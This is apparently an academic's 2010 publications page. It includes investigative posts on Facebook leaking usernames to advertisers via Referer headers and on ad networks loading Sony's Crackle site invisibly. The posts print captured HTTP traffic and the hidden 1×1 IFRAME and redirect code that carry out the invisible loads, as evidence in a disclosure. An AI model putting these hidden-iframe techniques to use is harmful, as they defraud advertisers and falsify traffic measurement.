In 2010, the Department of Transportation issued a Notice of Proposed Rulemaking (NPRM) on enhancing airline passenger protections. I filed a comment on one of the subjects under discussion: whether and how airlines should be required to disclose fees through GDS's, and what might happen if the DOT imposed such a duty without airlines contracting in advance to obtain such service from GDS's.
Least-Cost Avoiders in Online Fraud and Abuse
Edelman, Benjamin. “Least-Cost Avoiders in Online Fraud and Abuse.” IEEE Security & Privacy 8, no. 4 (July-August 2010): 78-81.
Web users face considerable fraud, malfeasance, and economic harm that system operators could prevent or mitigate. Although the legal system can respond, regulation has had mixed results. I examine the applicable legal rules that constrain online fraud, and their economic underpinnings, to assess whether those rules assign responsibility to the parties best positioned to take action.
The Pathologies of Online Display Advertising Marketplaces
Edelman, Benjamin. “The Pathologies of Online Display Advertising Marketplaces.” SIGecom Exchanges (June 2010), Article 2.
Display advertising marketplaces place “banner” ads on all manner of popular sites. While these services are widely used, they suffer significant challenges, including weak user response and low accountability for both advertisers and web site publishers. I survey a few major challenges, flagging possible areas for future research.
Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers (updated May 26, 2010)
Browse Facebook, and you wouldn’t expect Facebook’s advertisers to learn who you are. After all, Facebook’s privacy policy and blog posts promise not to share user data with advertisers except when users grant specific permission. For example, on April 6, 2010 Facebook’s Barry Schnitt promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.”
My findings are exactly the contrary: Merely clicking an advertiser’s ad reveals to the advertiser the user’s Facebook username or user ID. With default privacy settings, the advertiser can then see almost all of a user’s activity on Facebook, including name, photos, friends, and more.
In this article, I show examples of Facebook’s data leaks. I compare these leaks to Facebook’s privacy promises, and I point out that Facebook has been on notice of this problem for at least eight months. I conclude with specific suggestions for Facebook to fix this problem and prevent its recurrence.
Facebook’s data leak is straightforward: Consider a user who clicks a Facebook advertisement while viewing her own Facebook profile, or while viewing a page linked from her profile (e.g. a friend’s profile or a photo). Upon such a click, Facebook provides the advertiser with the user’s Facebook username or user ID.
Facebook leaks usernames and user IDs to advertisers because Facebook embeds usernames and user IDs in URLs which are passed to advertisers through the HTTP Referer header. For example, my Facebook profile URL is http://www.facebook.com/bedelman. Notice my username (yellow).
Of course, it would be incorrect to assume that a person looking at a given profile is in fact the owner of that profile. A request for a given profile might reflect that user looking at her own profile, but it might instead be some other user looking at the user’s profile. However, when a user views her own profile page, Facebook automatically embeds a “profile” tag (green) in the URL:
http://www.facebook.com/bedelman?ref=profile
Furthermore, when a user clicks from her profile page to another page, the resulting URL still bears the user’s own user ID or username, along with the details of the later-requested page. For example, when I view a friend’s profile, the resulting URL is as shown below. Notice the continued reference to my username (yellow) and the fact that this is indeed my profile (green), along with an appendage naming the user whose page I am now viewing (blue).
http://www.facebook.com/bedelman?ref=profile#!/pacoles
Each of these URLs is passed to advertisers whenever a user clicks an ad on Facebook. For example, when I clicked a Livingsocial ad on my own profile page, Facebook redirected me to the advertiser, yielding the following traffic to the advertiser’s server. Notice the transmission in the Referer header (red) of my username (yellow) and the fact that I was viewing my own profile page (green).
GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile
…
Host: livingsocial.com
…
The same transmission occurs when a user clicks from her profile page to a friend’s page. For example, I clicked through to a friend’s profile, http://www.facebook.com/bedelman?ref=profile#!/pacoles, where I clicked another Livingsocial ad. Again, Facebook’s redirect caused my browser to transmit in its Referer header (red) my username (yellow) and the fact that that username reflects my personal profile (green). Interestingly, my friend’s username was omitted from the transmission because it appeared after a pound sign, as a URL fragment, which browsers do not include in Referer headers.
GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile
…
Host: livingsocial.com
…
In further testing, I confirmed that the same transmission occurs when a user clicks from her profile page to a photo page, or to any of various other pages linked from a user’s profile.
With a Facebook member’s username or user ID, current Facebook defaults allow an advertiser (and anyone else) to obtain a user’s name, gender, other profile data, picture, friends, networks, wall posts, photos, and likes. Furthermore, the advertiser already knows the user’s basic demographics, since the advertiser knows the user fits the profile the advertiser had requested from Facebook. For example, in grey highlighting above, the advertiser learned from Facebook my age, gender, and geographic location.
Facebook’s Contrary Statements about User Privacy vis-a-vis Advertisers
Facebook has made specific promises as to what information it will share with advertisers. For one, Facebook’s privacy policy promises “we do not share your information with advertisers without your consent” (section 5). Then, in section 7, Facebook lists eleven specific circumstances in which it may share information with others — but none of these circumstances applies to the transmission detailed above.
Facebook’s recent blog postings also deny that Facebook shares users’ identities with advertisers. In an April 6, 2010 post, Facebook promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.” Facebook’s prior postings were similar. July 1, 2009: “Facebook does not share personal information with advertisers except under the direction and control of a user. … You can feel confident that Facebook will not share your personal information with advertisers unless and until you want to share that information.” December 9, 2009: “Facebook never shares personal information with advertisers except under your direction and control.” As to all these claims, I disagree. Sharing a username or user ID upon a single click, without any disclosure or indication that such information will be shared, is not at a user’s direction and control.
Facebook Has Been on Notice of This Problem for Eight Months
AT&T Labs researcher Balachander Krishnamurthy and Worcester Polytechnic Institute professor Craig Wills previously identified the general problem of social networks leaking user information to advertisers, including leakage through the Referer headers detailed above. In August 2009, their On the Leakage of Personally Identifiable Information Via Online Social Networks was posted to the web and presented at the Workshop on Online Social Networks (WOSN).
Through Krishnamurthy and Wills’ research, Facebook received actual notice of the data leakage at issue eight months ago. A September 2009 MediaPost article confirms Facebook’s knowledge through its spokesperson’s response. However, Facebook spokesperson Simon Axten significantly understated the severity of the data leak: Axten commented “The average Facebook user views a number of different profile pages over the course of a session …. It’s thus difficult for a tracking website to know whether the identifier belongs to the person being tracked, or whether it instead belongs to a friend or someone else whose profile that person is viewing.” I emphatically disagree. As shown above, when a user views her own profile, or a page linked from her own profile, the “?ref=profile” tag is added to the URL — exactly confirming the identity of the profile owner.
Since receiving actual notice of these data leaks, Facebook has implemented scores of new features for advertising, monetization, information-sharing, and reorganization. Inexplicably, Facebook has failed to address leakage of user information to advertisers. That’s ill-advised and short-sighted: Users don’t expect ad clicks to reveal their names and details, and Facebook’s privacy policy and blog posts promise to honor that expectation. So Facebook needs to adjust its actual practices to meet its promises.
Preventing advertisers from receiving usernames and user IDs is strikingly straightforward: A modified redirect can mask referring URLs. Currently, Facebook uses a simple HTTP 301 redirect, which preserves referring URLs — exactly creating the problem detailed above. But a FORM POST redirect, META REFRESH redirect, or JavaScript redirect could conceal referring URLs — preventing advertisers from receiving username or user ID information.
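To illustrate (this is only a sketch of the general technique, not Facebook’s actual code, and the /ads/click path and advertiser.example.com destination are hypothetical): Facebook could serve each ad click from a generic interstitial URL containing no username or user ID, and let that page forward the browser to the advertiser, so that at most the generic interstitial URL could ever reach the advertiser as a Referer.
<!-- hypothetical interstitial, served at a generic click URL such as /ads/click?adid=123 -->
<!-- (no username or user ID appears anywhere in this URL) -->
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://advertiser.example.com/landing">
<script type="text/javascript">
// JavaScript fallback: the advertiser receives, at most, this generic
// interstitial URL as a Referer -- never the user's profile URL.
window.location = "http://advertiser.example.com/landing";
</script>
</head>
<body></body>
</html>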
Instead, Facebook has partially implemented the pound sign method described above — putting some, but not all, sensitive information after a pound sign, with the result that sometimes this information is not transmitted as a Referer. If fully implemented across the Facebook site, this approach might prevent the data leakage I uncovered. However, in my testing, numerous within-Facebook links bypass the pound sign masking. In any event, an improved redirect would be much simpler to implement — requiring only a single adjustment to the ad click-redirect script, rather than requiring changes to URL formats across the Facebook site.
Finally, Facebook should inform users of what has occurred. Facebook should apologize to users, explain why it didn’t live up to its explicit privacy commitments, and establish procedures — at least robust testing, if not full external review — to assure that users’ privacy is correctly protected in the future.
On May 20, 2010, the Wall Street Journal reported the problem detailed above. On or about that same day, Facebook removed the ref=profile tags that were the crux of the data leak.
Yesterday I spoke with Arturo Bejar, a Facebook engineer who investigated this problem. Arturo told me that after Krishnamurthy and Wills’ article, he reviewed relevant Facebook systems in search of leakage of user information. At that time, he found none: Facebook revealed the URLs users were browsing when they clicked ads, but did not indicate whether the user clicking a given ad was in fact the owner of the profile showing that ad. However, in a subsequent Facebook redesign, beginning in February 2010, Facebook user home pages received a new “profile” button which carried the ref=profile URL tags I analyze above. Because this tag was added without a further privacy review, Arturo tells me that he and others at Facebook did not consider the interaction between this tag and the problem I describe above. Arturo says that’s why this problem occurred despite the prior Krishnamurthy and Wills article.
Arturo also pointed out that the problem I describe did not affect advertisers whose landing pages were pages on Facebook (rather than advertisers’ own external sites).
Meanwhile, Facebook’s May 24 “Protecting Privacy with Referrers” presents Facebook’s view of the problem in greater detail. Facebook’s posting offers a fine analysis of the various methods of redirects and Facebook’s choice among them. It’s worth a read.
After discussing the problem with Arturo and reading Facebook’s new post, I reached a more favorable impression of Facebook’s response. But my view is tempered by Facebook’s ill-advised attempts to downplay the breach.
- Rather than affirmatively describing the specific design flaw, Facebook’s post describes what “could” “potentially” occur. Facebook’s post never gives a clear affirmative statement of the problem.
- Facebook says advertisers would need to “infer” a user’s username/ID. But usernames and IDs are sent directly, in clear and unambiguous URLs, hardly requiring complex analysis.
- Facebook claims that the breach affected only “one case … if a user takes a specific route on the site” (WSJ quote). Facebook also calls the problem “a rarely occurring case” (posting). I dispute these characterizations. It is hardly “rare” for a user to view her own profile. To view her own profile and click an ad? There’s no reason to think that’s any less frequent than clicking an ad elsewhere. To view her own profile, click through to another page, and then click an ad? That’s perfectly standard. Furthermore, although Facebook told the Journal there is “one case” in which data is leaked improperly, in fact I’ve found many such cases including clicking from profile to ad, from profile to friend’s page to ad, and from profile to photo page to ad, to name three.
- Through transmission in HTTP Referer headers, usernames and IDs reach advertisers’ web servers in a manner such that default server log files would store this data indefinitely, and default analytics would tabulate it accordingly (see the illustrative log line after this list). Facebook says it has “no reason to believe that any advertisers were exploiting” the data breach I reported, but the fact is, this data ends up in a place where advertisers could (and, as to historic data, still can) access it easily, using standard tools, and at their convenience.
- Although Facebook’s post says the problem is “potential,” I found that a user’s username/ID is sent with each and every click in the affected circumstances.
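To make the log-file point concrete: assuming an advertiser’s server runs Apache with the standard “combined” log format (which records the Referer field by default), each click like the one shown earlier would leave a line along the following lines in the access log, with the Facebook username preserved in the referrer column. The entry below is hypothetical, shown only for illustration.
203.0.113.7 - - [14/May/2010:09:12:44 -0400] "GET /deals/socialads_reflector?do_not_redirect=1 HTTP/1.1" 200 5123 "http://www.facebook.com/bedelman?ref=profile" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"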
So the problem was substantial, real, and immediate. Facebook errs in suggesting the contrary.
Optimal Auction Design and Equilibrium Selection in Sponsored Search Auctions
Edelman, Benjamin, and Michael Schwarz. “Optimal Auction Design and Equilibrium Selection in Sponsored Search Auctions.” American Economic Review 100, no. 2 (May 2010): 597-602. (First circulated in 2006 as Optimal Auction Design in a Multi-unit Environment: The Case of Sponsored Search Auctions. Reprinted in The Economics of E-Commerce, Michael Baye and John Morgan, editors, 2016.)
We characterize the optimal (revenue maximizing) auction for sponsored search advertising. We show that a search engine’s optimal reserve price is independent of the number of bidders and independent of the rate at which click-through rate declines over positions. We separate the effects of reserve price increases into direct effects (on the low bidder) and indirect effects (on others), and we show that most of the incremental revenue from setting reserve price optimally comes from indirect effects.
Sony’s Crackle: Invisible Traffic Galore
Advertisers buying display ads from Sony’s Crackle.com rightly and reasonably expect that users can see the ads. After all, a visible ad is a basic and crucial condition for effective display advertising: If a user can’t see an ad, then the impression is wasted, as is the associated spending. Nonetheless, in a surprising series of incidents, numerous Crackle partners are loading the Crackle site invisibly — thereby charging advertisers for worthless invisible impressions.
Below, I present three recent examples of Crackle partners loading the Crackle site invisibly, largely via 1×1 IFRAMEs. I then tabulate observations preserved by my automation, demonstrating that Crackle’s tainted traffic has continued for more than a year. I conclude by flagging implications for traffic measurement and ad pricing, and by suggesting what Crackle should do to clean up this mess.
Example 1: Yahoo Right Media, Adjuggler Invisible (1×1) IFRAME Loads Crackle Invisibly
In testing of April 24, 2010, my Automatic Spyware Advertising Tester browsed a series of ad URLs I had previously observed to be loaded by various spyware (installed through security exploits without user consent). One such URL embedded Bcserving tags for a 160×600 IFRAME, which passed traffic through Yahoo Right Media (yellow) to Adjuggler (green). Crucially, Adjuggler responded with an invisible 1×1 IFRAME (red) loading a URL on the Crackle site (blue). Meanwhile, another 1×1 IFRAME loaded competing video site Buddytv (grey).
GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=1292398882782181&nc=26008239 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgAcAAoAAAAAAP8AAAAHGBe4GAAAAAA
ANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIAAgAAAAAAXI.C9Shczz
9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJXq7VaJccC
LvQxO2LYSYeejv1pj-PofdqHVgeAAAAAA==,,…,4256ee3e-5018-11df-ace3-001e6837e93f
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_185B9A7222F0F2E13794DA5C=a; ajcmp=2023xkW0101Em0039kn
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sun, 25 Apr 2010 03:11:36 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
document.write("<"+"IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC="http://search.dailygamingupdates.com/ioq1wEIC6YxRSnWiIC9BHpdX0b1i.html"><"+"/IFRAME><"+"br><"+"/br>\n");
document.write("\n");
document.write("\n");
document.write("<"+"IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC="http://crackle.com/c/A_River_Runs_Through_It/?cmpid=762"><"+"/IFRAME><"+"br><"+"/br>\n");
document.write("\n");
document.write("<"+"iframe src="http://www.buddytv.com/home2/american-idol-home2.aspx" width="1" height="1" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"><"+"/iframe>");
The net effect was to load the Crackle site completely invisibly. The page-load also embedded tracking tags for comScore/ScorecardResearch (yellow). Unless comScore takes special steps to recognize and discount these invisible loads of the Crackle site, the presence of these tags would cause comScore services to overstate Crackle’s popularity.
<script type="text/javascript">
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script type="text/javascript">
COMSCORE.beacon({
c1: 2,
c2: 6035898,
c3: "",
c4: "Crackle.com",
c5: "030224",
c6: "",
c15: ""
});
</script>
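For what it’s worth, detecting such invisible loads is not difficult. The sketch below — my illustration only, not a description of anything comScore actually does — checks the visible dimensions of the window and fires the beacon only when the page is plausibly viewable:
<script type="text/javascript">
// Sketch: skip the measurement beacon when the page is rendered in a frame
// too small for any user to see (e.g. the 1x1 IFRAMEs shown above).
var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
if (w > 10 && h > 10) {
  // fire the beacon only for plausibly visible page-loads
  COMSCORE.beacon({
    c1: 2,
    c2: 6035898,
    c4: "Crackle.com"
  });
}
</script>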
Example 2: Yahoo Right Media, Adjuggler, Media Javelin Overflowing IFRAME (1280×800 inside 160×600) Loads Crackle Invisibly
In testing of April 14, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to an ad on Adjuggler (green) with an HTML comment referencing Media Javelin (pink). The placement was purportedly a 160×600 (grey), yet the response included a further 160×600 ad (completely filling the available space) (grey) followed by three 1280×800 IFRAMEs (red). The third of these IFRAMEs passed traffic to an Adspeed URL (orange) which passed traffic to Crackle (blue).
GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=9001545836619459&nc=92606617 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAEAh e4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIA AgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_…=a; ajcmp=…
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Wed, 14 Apr 2010 05:43:20 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
Set-Cookie: ajcmp=…;Max-Age=315360000;expires=Sat, 11 Apr 2020 05:43:20 GMT;Path=/
document.write("<"+"!-- BEGIN STANDARD TAG - 160 x 600 - Mediajavelin.com: Run-of-site - DO NOT MODIFY -->\n");
document.write("<"+"IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=1024x800&section=820955"><"+"/IFRAME>\n");
document.write("<"+"!-- END TAG -->\n");
document.write("\n");
document.write("\n");
document.write("<"+"!-- AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_home_cpc 1280x800 --><"+"iframe width="1280" height="800" src="http://g.adspeed.net/ad.php?do=html&aid=82609&wd=1280&ht=800&target=_top" frameborder="0" scrolling="no" allowtransparency="true" hspace="0" vspace="0"><"+"img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&aid=82609&wd=1280&ht=800&pair=as" width="1280" height="800"/><"+"/iframe><"+"!-- AdSpeed.com End -->\n");
document.write("\n");
document.write("<"+"!-- AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_idol_cpc 1280x800 --><"+"iframe width="1280" height="800" src="http://g.adspeed.net/ad.php?do=html&aid=82610&wd=1280&ht=800&target=_top" frameborder="0" scrolling="no" allowtransparency="true" hspace="0" vspace="0"><"+"img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&aid=82610&wd=1280&ht=800&pair=as" width="1280" height="800"/><"+"/iframe><"+"!-- AdSpeed.com End -->\n");
document.write("\n");
document.write("\n");
document.write("\n");
document.write("<"+"!-- AdSpeed.com Serving Code 7.9.4 for [Ad] Crackle_blood_cpc 1280x800 --><"+"iframe width="1280" height="800" src="http://g.adspeed.net/ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top" frameborder="0" scrolling="no" allowtransparency="true" hspace="0" vspace="0"><"+"img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&aid=82611&wd=1280&ht=800&pair=as" width="1280" height="800"/><"+"/iframe><"+"!-- AdSpeed.com End -->\n");
document.write("");
GET /ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAE Ahe4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAA AAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: g.adspeed.net
Connection: Keep-Alive
HTTP/1.1 200 OK
P3P: policyref=”http://g.adspeed.net/w3c/p3p.xml”, CP=”NOI CUR ADM OUR NOR STA NID”
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Content-type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Wed, 14 Apr 2010 05:43:19 GMT
Server: AdSpeed/s10
<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><SCRIPT language="JavaScript">
<!--
window.location="http://crackle.com/c/Blood/?cmpid=763";
//-->
</SCRIPT><div style="position:absolute;left:0px;top:0px;visibility:hidden;"><img src="http://g.adspeed.net/ad.php?do=imp&zid=0&aid=82611&auth=0DB7FD0BC9&wd=1280&ht=800&cb=1271223799" alt="i" width="1" height="1" /></div></body></html>
The net effect was to load the Crackle site completely invisibly. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
Example 3: Yahoo Right Media, Extreme-sportsonline, Hotbizguide Double Invisible (1×1) IFRAMEs Load Crackle Invisibly
In testing of April 13, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to Extreme-sportsonline (green), which included a 1×1 IFRAME (grey) passing traffic to Hotbizguide (pink). Hotbizguide returned two separate 1×1 IFRAMEs (red) loading Crackle (blue).
GET /BhkG9KftZrBezVPLOKuGW5pr4LRA.html HTTP/1.1 …
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJGEgAAAAAAARoEwAAAAAAAgA0AAIAAAAAAP8AAA ADChe4GAAAAAAASncaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYA AAAAAAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHyzysEFgNCMHLNiu.ziQAnw9Ws9ezWVJH53CoAAAAAA==,,…
Host: search.extreme-sportsonline.com …
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 13:37:58 GMT
…
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ; }
function trigger() { step++; if(step==max_steps){ load_content(); } }
</script>
<div id="inifrcode"></div>
<iframe src="http://search.hotbizguide.com/66682d5b6048f47cf70e56deb9989bb1.php" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" width="1" height="1" onload="trigger();"></iframe><!--inifrcode-->
<div id="stuff"></div>
<div id="stuff1"></div>
<div id="innercode"></div>
</body>
</html>
GET /MTNkyUL9SGHUGOPKuJJ7uj3AOWuN.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://search.mobilegamesearch.com/NgVbJ4eWaW7bMt57RcZVGMggRW9t.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: search.hotbizguide.com
Connection: Keep-Alive
Cookie: PHPSESSID=a8qbtgec2k79fd8c6onqp5k3q6
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 21:45:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trkid=…; expires=Fri, 16-Apr-2010 21:45:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ><iframe src="http://crackle.com/c/A_River_Runs_Through_It/?cmpid=728" width="1" height="1" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<iframe src="http://crackle.com/c/The_Beast/?cmpid=692" width="1" height="1" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<!--customcode-->
The net effect was to load the Crackle site completely invisibly, twice. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
To confirm the scope of Crackle’s invisible and forced-visit traffic and to evaluate trends over time, I searched logs preserved by my Automatic Spyware Advertising Tester. My tester records the URLs of pages loaded by the spyware-infected virtual computers, but my tester never intentionally visited the Crackle site, nor did my tester ever prompt or provoke traffic to Crackle in any way. So if my tester observes traffic to Crackle, that traffic must have occurred unrequested — invisibly or, at best, through a spyware popup or popunder.
The following table summarizes my tester’s observations of traffic to Crackle:
Period | Number of observations of traffic to Crackle.com
Q1 2009 | 15
Q2 2009 | 57
Q3 2009 | 95
Q4 2009 | 31
Q1 2010 | 51
April 2010 (month to date) | 74
Although my testing methods have changed over time (e.g. to test new spyware), my testing intensity has remained constant. I have no specific reason to expect that adjustments to my methods would be more or less effective at uncovering Crackle incidents. I therefore tend to attribute month-to-month changes to changes in the intensity with which Crackle’s partners purchase invisible traffic and other tainted traffic on Crackle’s behalf. In my experience, most traffic-buyers run on-and-off campaigns — buying traffic for a time, then taking a break. If Crackle’s traffic buying followed a similar approach, spikes would be expected.
In any event, invisible and forced-visit traffic to Crackle cannot be written off as a short-term anomaly. Quite the contrary, my tester’s observations confirm that these problems have persisted for many months.
Advertisers buying placements on Crackle reasonably expect high-quality traffic. For example, the first clause of Crackle’s “About” page boasts that Crackle is owned by Sony, and Sony’s size and wealth provide a level of accountability that smaller video sites cannot offer. Nonetheless, my observations confirm that some placements on Crackle are entirely worthless.
Crackle may blame its tainted and invisible traffic on traffic brokers, affiliates, and other external forces. But traffic-buying inevitably invites exactly these shenanigans. If Crackle intends to buy traffic, it should better vet its partners — including confirming partners’ bona fides, overseeing partners’ specific methods, and developing procedures to hold partners accountable for any shortfalls. I’ve seen no sign of any such efforts. If Crackle can’t buy traffic with the requisite skill, perhaps Crackle would do better by ceasing to buy traffic at all.
Three years ago, I posted How Spyware-Driven Forced Visits Inflate Web Site Traffic Counts, pointing out that cheap spyware and popup traffic can increase measurements of web site popularity. Users at least see those spyware popups, giving some nugget of rationale for resulting traffic figures. But users cannot even see the Crackle site when it is loaded invisibly as detailed above. Nonetheless, invisible site-loads are still likely to inflate measurements of Crackle’s traffic. For example, during the first few days of April 2010, my tester observed rampant fake traffic to Crackle — and Alexa simultaneously reported a major spike in Crackle’s traffic. (See image at right.) Furthermore, with comScore tags embedded in each Crackle impression, comScore systems receive a report each time Crackle’s site is loaded. Indeed, such reports come from a large number of distinct IP addresses — seemingly confirming that the traffic is legitimate. Can comScore successfully recognize and discount invisible loads of the Crackle site? If not, comScore will join Alexa in overstating Crackle’s popularity.
My bottom line? Buying traffic is a dirty business — so many sellers who provide worthless traffic, and so many buyers who use too little care in selecting and assessing the traffic they buy. As it stands, advertisers and networks doing business with Crackle risk paying for ads users cannot see. Plenty of small-time video sites play these games, but it’s disappointing to see a Sony site stoop to that level.
Measuring Typosquatting Perpetrators and Funders
Moore, Tyler, and Benjamin Edelman. Measuring Typosquatting Perpetrators and Funders. Light Blue Touchpaper. February 17, 2010.
Introduction to Moore, Tyler, and Benjamin Edelman. “Measuring the Perpetrators and Funders of Typosquatting.” In Financial Cryptography and Data Security: Proceedings of the International Conference, Lecture Notes in Computer Science 6052 (2010). Springer-Verlag.
Google Inc. (teaching materials) with Thomas Eisenmann
Edelman, Benjamin, and Thomas R. Eisenmann. “Google Inc.” Harvard Business School Case 910-036, January 2010. (Revised April 2011.) (Winner of ECCH 2011 Award for Outstanding Contribution to the Case Method – Strategy and General Management.) (educator access at HBP.)
